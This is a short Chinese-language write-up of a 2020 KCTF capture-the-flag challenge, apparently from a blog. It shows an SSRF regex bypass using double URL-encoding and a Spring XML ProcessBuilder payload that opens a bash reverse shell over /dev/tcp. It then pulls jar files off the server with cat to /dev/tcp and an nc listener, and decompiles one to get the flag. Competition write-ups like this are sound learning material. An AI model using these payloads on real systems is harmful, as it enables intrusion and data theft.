[KCTF2020] 第一题 至暗时刻

/ 0评 / 0

第一题 至暗时刻

需要ssrf127.0.0.1的8088端口 有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://ip/payload.xml
ssrf成功后发现需要xml
发现可以用FileSystemXmlApplicationContext 命令执行
https://www.cnblogs.com/afanti/p/10815728.html
使用这里的payload拿shell

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash >& /dev/tcp/ip/2333 0>&1]]

image-20201118141836349

拿到shell以后 把home下的jar下载回来

cat /home/*.jar > /dev/tcp/ip/port
nc -lvnp port >1.jar

用jd-gui 反编译拿到flag

img

 

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注